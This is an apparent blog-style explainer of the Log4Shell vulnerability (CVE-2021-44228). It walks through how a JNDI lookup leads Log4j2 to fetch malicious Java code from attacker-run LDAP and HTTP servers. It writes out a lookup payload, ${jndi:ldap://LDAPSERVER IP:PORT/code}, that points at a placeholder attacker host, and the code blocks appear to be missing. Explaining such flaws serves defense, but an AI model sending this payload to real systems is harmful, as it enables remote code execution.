CVE-2021-44228 Analysis How does it work? Below is a detailed process of a remote injection case by exploiting log4shell vulnerability. First, there are 3 part we need to know: Log4j2 allows for the logging of data using a feature called message lookup substitution, where log messages can include data dynamically pulled from various sources. (It supports JNDI Lookup) JNDI Lookup: Allows data to be fetched via the Java Naming and Directory Interface (JNDI) API, which can interact with different directory services LDAP (Lightweight Directory Access Protocol): Used primarily for accessing and managing directory information services over a network. Here is a simple example of Remote Code Execution: Hacker set up both LDAP server (accessed by LDAP protocol, keeping a Java malicious code reference) and HTTP server (the place store malicious code) Set up a HTTP Server in the directory that contain compiled malicious code: Set up a LDAP Server that store reference: Hacker sends malicious Input (${jndi:ldap://LDAPSERVER IP:PORT/code}) to software system that have installed log4j2 Log4j2 using the lookup feature to send request to LDAP server LDAP server redirect requests to HTTP servers via Java code references stored in LDAP servers HTTP server sends back malicious code to software system, and then software system executes the malicious code. Malicious Code: Execute malicious code succeeded: IMPORTANT: It is not we can only use LDAP server to do…Read More